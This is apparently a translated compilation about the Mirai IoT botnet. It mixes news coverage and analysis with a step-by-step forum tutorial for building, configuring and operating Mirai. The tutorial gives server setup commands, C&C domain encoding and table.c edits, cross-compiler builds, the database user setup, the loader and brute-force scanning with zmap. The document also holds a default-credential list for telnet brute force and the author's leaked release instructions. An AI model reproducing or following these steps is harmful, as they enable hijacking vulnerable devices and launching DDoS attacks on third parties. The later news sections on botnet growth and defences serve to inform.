Mirai source code. Installation and configuration of the Mirai botnet. Operating principle of Mirai

At its core, Mirai works simply: it scans the Internet looking for IoT devices accessible via telnet that are vulnerable to brute force and hacking. The malware primarily attacks surveillance cameras, DVRs, and routers, and then continues to multiply like a worm.

From DDoS attacks carried out by this botnet recently and the largest in Europe. Peak attack power reached 620 Gbit/s and more than 1 Tb/s. To achieve such results, the attackers used UDP, DNS and HTTP flooding, as well as GRE (Generic Routing Encapsulation) packets, which experts recognized as very unusual.

The conclusions of MalwareTech specialists generally coincide with these observations. So, over a twelve-hour period, researchers recorded about 72,000 unique IP addresses, and 4,000 new IPs appeared every hour. From this, analysts concluded that the size of the botnet is very modest - only about 120,000 devices per day. And although the botnet is much larger and the figures are 1-1.5 million bots, neither MalwareTech researchers nor Akamai specialists agree with this.

“Mirai, which was previously largely ignored due to the simplicity of telnet attacks, became a major topic of discussion in the media around the world last week, with law enforcement agencies launching investigations, with the support of many international companies,” the researchers write. “It is highly likely that powerful DDoS attacks will now become more common practice as hackers find more and more vulnerable IoT devices or begin to infect NAT-protected devices. It's definitely time for manufacturers to stop releasing devices with global passwords by default and switch to releasing devices with randomly generated passwords on the bottom of the case."

In addition to the report, MalwareTech researchers have included a video showing a map of Mirai infections (see below). Also on the researchers’ website you can find an interactive map of the botnet, which is updated in real time.

We will need two VPS KVM servers and a domain. Virtualization is KVM, OpenVZ is missing this time.

I take the servers here -

We will install the botnet itself on one server, and scan bots on the second. (brutal)

IMPORTANT. Servers must be based on Debian 8 and have at least 1GB of RAM.

Any domain, it doesn't matter.

Sorry, of course, but I won’t tell you how to attach a domain to a VPS. It's not difficult, you'll figure it out yourself.

PuTTY and let's begin.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang electric-fence screen sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

When installing MySQL, you will need to create a password to access MySQL for the root user. You will come up with a normal password, without any “qwerty”

Write it down somewhere, we will need it again.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#bash< <(curl -s -S -L

You must be registered to see links.

# gvm install go1.4

# gvm use go1.4 [--default]

# gvm install go1.4 -B

# gvm use go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm use go1.5

# gvm install go1.8

# gvm use go1.8

After installing all the utilities, download the bot sources -

You must be registered to see links.

And upload it to the server. Team wget, or simply through the program WinSCP.

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string *******(we write our domain, which is attached to the server) and press Enter.

Here you will see the following text -

XOR"ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - here you will have a different number, so don’t worry, everything is correct.

We copy all this text.

Open via nano editor, or via WinSCP file table.c which is in the folder mirai/bot

Must see this -

You must be registered to see links.

Line add_entry(TABLE_CNC_DOMAIN- change everything in quotes to your text that you just copied. Instead of " 30 " We write our number, which we also just copied. We do the same with the line add_entry(TABLE_SCAN_CB_DOMAIN

Save and close the editor.

Open the file with an editor mirai/cnc/main.go

We see this -

You must be registered to see links.

"127.0.0.1" change to "127.0.0.1:3306"

"password" We change the password that we entered earlier to our MySQL. "

Save the file and close the editor.

Just copy all this crap, I won’t tell you why it’s needed -

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

#mv cross-compiler-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql

# go get github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh debug telnet

# ./build.sh release telnet

# mv mirai* /var/www/html

# cd /var/www/html

#mkdirbins

#mv*bins/

Now MySQL.

# mysql -u root -p

Here you will be asked for a password. Enter the password you previously set.

# create database mirai;

# use mirai

Now copy all the text from here -

You must be registered to see links.

Paste it in and press Enter.

Copy the text from here -

You must be registered to see links.

Instead of anna-senpai write your login. Any. Same with myawesomepassword. We will need this data to access the bot control panel.

It should be like this - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Copy, paste, press Enter.

Now you can go out.

It's almost done.

# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# screen ./cnc

Must see the inscription MySQL DB opened

We don’t close this session, we open a new one.

You must be registered to see links.

Instead of *******, write your domain and click Open.

Enter your username and password, in my case it is -

zaebalsjapisatj

That's it, we are in the bot control panel.

Now we need bots. Everything is simple here, no installations are needed.

Let's configure loader.

Loader is needed so that bots can be added from text files. Let's say we've created a bunch of devices (routers, cameras, phones) and to add them to the bot, we need a loader.

Also loader is a "worm"

Connect to our server via PuTTY and WinSCP.

Using WinSCP we find the file main.c in folder Mirai-Source-Code-master/dlr

We write the IP of our server as in the screenshot -

You must be registered to see links.

We leave the commas, that’s how it should be. Save and close.

Now with PyTTY go to our server and write -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# cd release

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Now let's open WinSCP and find the file main.c in folder Mirai-Source-Code-master/loader/src

We change it to our IP as in the screenshot -

You must be registered to see links.

Save and close.

Through PuTTY -

# ./build.sh

By using WinSCP open the file scanListen.go which can be found in the folder Mirai-Source-Code-master/mirai/tools

Change to your server IP -

You must be registered to see links.

Then with PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# go build scanListen.go

Now we have a new file - scanListen(without .go, Just scanListen)

scanListen need to be moved to a folder Mirai-Source-Code-master/loader

Just with help WinSCP put it in a folder loader

Now let's check if everything works

# ./loader

If you see what is on the screen, then everything is correct -

You must be registered to see links.

If errors occur, write to the topic, I will help.

To download bots from the list, drop the text file into the folder loader and type the command -

# cat list.txt | ./loader

That's it, all the bots you recruited will be with you, they will crash sites at your command.

I personally haven’t used this method, I found an easier way.

Here we need a second server. Also on Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap we need it for port scanning. The principle of operation is the same as KPortScan, only 50 times faster.

Copy all the code from here -

You must be registered to see links.

And save as scan.py

Here you can add your passwords and logins -

You must be registered to see links.

String combo don't touch!

Here you need to register the IP of the server on which the bot is located -

You must be registered to see links.

We change everything and save it.

We drop the scan.py file anywhere on our server. On the second server, which is purely for scanning, the one on which we do not touch the bot.

We need IPs that we will scan.

#zmap -p22 -o list.txt -B 100M(you can scan other ports, I always scanned 22 or 23)

All results will be in the file list.txt

After collecting the IP (the more the better) file list.txt throw it next to the file scan.py and write -

# python scan.py list.txt 500

That's it, we sit and watch how our botnet grows.

When there are at least 200 bots, you can launch loader.

To do this, go to the server where the botnet is installed and -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./loader

Now the bot will work like a “worm” and finish off more bots.

Last week, the source code for the components of the Mirai botnet, used in record-breaking DDoS attacks with a capacity of up to 1 Tb/s, leaked online.

Art. 273 of the Criminal Code of the Russian Federation. Creation, use and distribution of malicious computer programs

1. Creation, distribution or use of computer programs or other computer information, knowingly intended for unauthorized destruction, blocking, modification, copying of computer information or neutralization of computer information protection means, -

shall be punishable by restriction of liberty for a term of up to four years, or forced labor for a term of up to four years, or imprisonment for the same term with a fine in the amount of up to two hundred thousand rubles or in the amount of the wages or other income of the convicted person for a period of up to eighteen months.

2. Acts provided for in part one of this article, committed by a group of persons by prior conspiracy or by an organized group or by a person using their official position, as well as those that caused major damage or were committed out of selfish interest, -

shall be punishable by restriction of freedom for a term of up to four years, or forced labor for a term of up to five years with deprivation of the right to hold certain positions or engage in certain activities for a term of up to three years or without it, or imprisonment for a term of up to five years with a fine of one hundred thousand to two hundred thousand rubles or in the amount of wages or other income of the convicted person for a period of two to three years or without it and with or without deprivation of the right to hold certain positions or engage in certain activities for a period of up to three years.

3. Acts provided for in parts one or two of this article, if they entailed grave consequences or created a threat of their occurrence, -

shall be punishable by imprisonment for a term of up to seven years.

This botnet consists mainly of cameras, DVR devices, etc.

Infection occurs quite simply: the Internet is scanned for open 80/23 (web/telnet) ports and hard-coded accounts are selected.

Few users change the passwords of their built-in accounts (if possible), so the botnet is constantly replenished with new devices. If you can change the password for the web interface while in it, then the password and the very presence of telnet access simply eludes many users.

The most commonly used accounts are:

enable:system
shell:sh
admin:admin
root:xc3511
root:vizxv
root:admin
root:xmhdipc
root:123456
root:888888
support:support
root:54321
root: juantech
root:anko
root:12345
admin:
root:default
admin:password
root:root
root:
user:user
admin:smcadmin
root:pass
admin:admin1234
root:1111
guest:12345
root:1234
root:password
root:666666
admin:1111
service:service
root:system
supervisor:supervisor
root:klv1234
administrator:1234
root:ikwb
root:Zte521

After gaining access, the command center receives a binary notification about the presence of a new bot:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (the host address was here)
05 = Tab
17 = 23 (Port 23 Telnet)
05 = Tab
61 64 6d 69 6e = username:admin admin
05= Tab
61 64 6d 69 6e = user password: admin

The botnet components are designed to work in different environments, as evidenced by the identified samples:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

Command servers are currently located at the following addresses:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

The instructions for creating a botnet are quite simple, here is as is (source http://pastebin.com/E90i6yBB):

Hello everyone,

When I first go in the DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs were slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. “We still have better kung fu than you kiddos” don’t make me laugh please, you made so many mistakes and even confused some different binaries with mine. LOL

Let me give you some slaps back—
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for “making the delay”, it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol “And doing the backdoor to connect via HTTP on 65.222.202.53.” you got tripped up by signal flow ;) try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was “sinden style”, but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say ‘chroot(“/”) so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you “beat me” with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

Just as I will forever be free, you will be doomed to mediocracy forever.

Requirements
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

OP Requirements
2 VPS and 4 servers
— 1 VPS with extremely bulletproof host for database server
— 1 VPS, rootkitted, for scanReceiver and distributor
— 1 server for CNC (used like 2% CPU with 400k bots)
— 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

— To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
— Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding a brute result, the bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
— Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utility scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call “real-time-load”. Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections — in theory, this value lot less). I would have maybe 60k — 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

— TABLE_CNC_DOMAIN — Domain name of CNC to connect to — DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards:)
— TABLE_CNC_PORT — Port to connect to, its set to 23 already
— TABLE_SCAN_CB_DOMAIN — When finding brute results, this domain it is reported to
— TABLE_SCAN_CB_PORT — Port to connect to for brute results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c — You must compile this to output things to put in the table.c file

Run inside this mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won’t affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com
The output should look like this

XOR’ing 20 bytes of data…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see “XOR’ing 20 bytes of data”. This value must replace the last argument as well. So for example, the table.c line originally looks like this
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Now that we know value from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22″, 20); //fuck.the.police.com
Some values ​​are strings, some are port (uint16 in network order / big endian).
CONFIGURE THE CNC:
apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0iL9g

This will create a database for you. To add your user,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Now, go into file ./mirai/cnc/main.go

Edit these values
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
To the information for the mysql server you just installed

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

http://pastebin.com/1rRCc3aD
The CNC, bot, and related tools:
http://dopefile.pk/a9f2n9ewk8om
How to build bot + CNC
In mirai folder, there is build.sh script.
./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: “mirai.$ARCH” to ./mirai/release folder

Loader reads telnet entries from STDIN in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget.
./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
cat file.txt | ./loader
Remember to limit!

Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like “My bot not connect, fix it”

This is the Trojan that everyone has been writing about for the last few weeks. Among the most impressive achievements of botnets created with its help is a capacity of more than a terabit and in a small African country.

How many computers did he enslave for this?

Not at all. Or at least very little. Mirai's target devices are not computers at all, but IoT devices - video recorders, cameras, toasters... According to statistics from Level 3 Communications, by the end of October, about half a million devices were already under the control of the Trojan.

And what, he can grab any cameras with refrigerators?

Not really. Mirai is designed for devices running Busybox, a simplified set of UNIX utilities command line, which is used as the main interface in embedded operating systems. The Trojan only attacks certain platforms, such as ARM, ARM7, MIPS, PPC, SH4, SPARC and x86. Only devices with factory settings or very weak protection are at risk - infection occurs using a brute force attack on the Telnet port, for which the default list of administrator credentials is used.

It’s somehow ineffective to search the entire Internet for cameras without passwords - isn’t it?

But they didn’t guess right. A journalist from The Atlantic rented a server and wrote a program that pretends to be a toaster. The first attack on a “household appliance” occurred after 40 minutes! Over the next 11 hours, the toaster was hacked more than 300 times. The fact is that botnets have reached unprecedented sizes, and the IPv4 address space for them is very small. Moreover, it is worth remembering that hackers do not search for vulnerable devices manually - this is done by members of the botnet. And, since each newly converted “employee” also begins to look for victims, the botnet grows exponentially.

Geometrically? So in a year, botnets will contain trillions of devices?!

Of course not 😀 The fact is that the number of IoT devices is finite. And this is already quite a pressing problem. The author of Mirai admits that the maximum number of devices on his network was 380 thousand, and after several attacks, when users and providers began to take protective measures, the number of devices dropped to 300 thousand and continues to decline.

After the source code of Mirai was made publicly available, many and many hackers began to use it. Currently, the number of large botnets based on this Trojan is about 52. It is worth clarifying that each device can belong to only one network - immediately after capturing a device, the malware protects it from re-infection. The only case when a device can be transferred to another “owner” is when the device is restarted. According to experts, after a restart the device will be infected again within 30 seconds.

So the effectiveness of Mirai is decreasing?

Yes. Hackers are forced to fight for a limited amount of resources, which is decreasing (due to precautions) rather than growing. The situation is further complicated by the fact that hackers are extremely selfish - for example, after a major command and control (C&C) server of the botnet was simply turned off - now the botnet turned out to be useless and invulnerable to new attacks. Each new network based on Mirai will be smaller than the previous ones and will only be able to carry out low power attacks. For example, during the US elections, weak attacks were carried out on the websites of Clinton and Trump. They did not cause any damage, and no one noticed them at all (except for the company that specifically monitors the actions of this Trojan).

It's clear. What else interesting information is known about this Trojan?

It is the successor of another Trojan, which is known by the names Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor and Torlus. The latter is known for being able to subjugate about a million webcams, according to the same Level 3 Communications. It is also known that most botnets do not use a pure copy of Mirai, but their own, modified versions (which is quite expected).

Another interesting fact is that RuNet users found in source code Mirai Russian trace - in the file cnc/admin.go there is an output of comments in Russian:

cnc/admin.go: this.conn.Write(byte(“\033))

On the other hand, it looks more like a joke - “checking the accounts...” is an obvious copy (machine translation?) of “checking accounts”.

Last month there were attacks on large sites like Twitter or Spotify, which temporarily disabled them. A botnet was used for this Mirai, uniting 400-500 thousand Internet of Things devices. Now Motherboard journalists have learned that two hackers managed to seize control of the botnet and create a new version of it - it already unites a million devices. Subscribers of the German provider have experienced its power Deutsche Telekom, whose network was down last weekend.

Hunting for Mirai

Journalists managed to talk to one of these two mysterious hackers - he uses the nickname BestBuy. In an encrypted online chat, he told them that there was a real struggle among hackers for control of Mirai. A vulnerability was recently discovered in its software. Its use, coupled with its speed, could allow BestBuy and its partner Popopret to seize control of most of the botnet and add new devices to it.

Previously, our experts studied the code of the Mirai botnet - it turned out that it was not created specifically for Internet of Things devices. Malicious software searches for devices connected to the network with default logins and passwords (admin:admin, root:password, etc.). This means that, theoretically, it can include any devices, including home computers and servers or routers.

IoT devices- usually routers - included in Mirai botnet until it reboots - then the worm is erased from their memory. However, the botnet constantly scans the Internet for vulnerable devices, so that a “cured” device can quickly become part of it again. There is a real race among hackers to be the first to infect as many devices as possible.

There is no information about how the creators of the new Mirai manage to overtake their competitors. However, they told reporters that they use their own botnet to scan potentially vulnerable devices, including those that were previously part of the botnet.

"Why not have the Mirai hunt the Mirai and devour the original," says BestBuy.

Not only Mirai

However, the new botnet not only absorbed old Mirai devices and new ones with default passwords. Its creators also use 0-day vulnerabilities in the firmware of IoT devices. Experts previously predicted the imminent emergence of such “combined” botnets.

The fight against them becomes noticeably more complicated - if in order to counter Mirai the user of the end device only needs to change the login and password to access it, then he will not be able to cope with the vulnerabilities of the gadget on his own.

DDoS at 700 Gbps

Hackers BestBuy and Popopret have started advertising their services - they offer access to their new version Mirai, sending spam messages via XMPP/Jabber,

According to the hacker, they offer customers several packages of services. Cheaper one is worth it $2 000 - for this money clients can rent from 20,000 to 25,000 botnet nodes to launch sentries for up to two weeks, with a break time of fifteen minutes between attacks. Behind $15 000 or $20 000 customers now have the opportunity to have 600,000 bots launch two-hour attacks with 30 or 15-minute breaks. In the second case, the attack power will be 700 Gbit/s or more.

Prospects

Safety IoT devices is often at a fairly low level - this is explained by the fact that vendors are often not interested in implementing additional measures information security. They advertise the ease of use of their products, but all the additional security measures impose restrictions and require resources.

As stated above, only end device developers or providers providing them (in the case of routers) can protect users from more advanced botnets. The German provider Deutsche Telekom, affected by the attack of the new version of Mirai, has already announced that it will “reconsider business relations” with suppliers of vulnerable routers Speedport, company Arcadyan.

Ultimately, it will be possible to increase the level of security of the Internet of Things through the introduction of stricter control of devices on the part of providers, on the one hand, and the development of standards and regulatory documentation for IoT, on the other. Similar measures have already been taken in many countries to ensure the safety of automated process control systems. The first steps in this direction have already been taken - for example, several IT vendors published a document in September called The Industrial Internet Security Framework (IISF)- it proposes to consider the Internet of things as part of the “industrial Internet”.

However, the issue is still far from being finally resolved, and hackers BestBuy and Popopret may obtain a monopoly on large-scale DDoS attacks online. This is a rather sad fact, but the hackers themselves, during a conversation with Motherboard declared that their activities would be guided not only by profit, but also by moral principles. So BestBuy said that they will not allow customers to attack the IP addresses of companies working with critical infrastructure.